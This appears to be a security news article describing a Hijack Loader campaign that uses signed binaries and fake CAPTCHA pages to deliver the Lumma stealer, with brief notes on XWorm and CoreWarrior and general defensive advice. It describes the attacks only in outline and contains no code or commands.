Cybersecurity experts have uncovered a new malware campaign that deploys Hijack Loader, a malicious program signed with legitimate code-signing certificates. The attack, detected earlier this month, is aimed at distributing an information-stealing malware called Lumma.
Hijack Loader, also known as DOILoader, first emerged in September 2023. Attackers often trick users into downloading this malware by disguising it as pirated software or media.
Recent variations of this campaign have become more sophisticated, directing victims to fake CAPTCHA pages. These pages prompt users to copy and run an encoded PowerShell command, which delivers the malware as a ZIP archive.
Researchers have observed multiple forms of this PowerShell-based attack since mid-September 2024. Some of these versions exploit legitimate tools such as `mshta.exe` and `msiexec.exe` to download and execute malware from remote servers.
The ZIP file involved contains a valid executable vulnerable to DLL side-loading and a malicious DLL (Hijack Loader) that decrypts and runs the final payload, designed to download and execute the Lumma information stealer.
Interestingly, in October 2024, the delivery method shifted to using signed binaries to avoid detection. While it’s unclear if the certificates used were stolen or intentionally generated by the attackers, experts believe the latter is possible.
The certificates have since been revoked, but the case highlights how malware can be signed, demonstrating that code signatures are not always reliable indicators of software trustworthiness.
This discovery comes as other malware threats, such as the trojan CoreWarrior and the commodity malware XWorm, continue to spread. Phishing campaigns have been using XWorm to infect systems by delivering a PowerShell script disguised as a Windows Script File (WSF).
The latest version of XWorm, version 5.6, includes advanced capabilities like screenshot collection, denial-of-service (DoS) attacks, and tampering with host files, making it a potent tool for cybercriminals.
To prevent falling victim to malware like Hijack Loader and XWorm, organizations should adopt advanced endpoint detection and response (EDR) systems and regularly update their security software. Avoid downloading software from unverified sources and always verify the legitimacy of files, even if they appear to be signed.
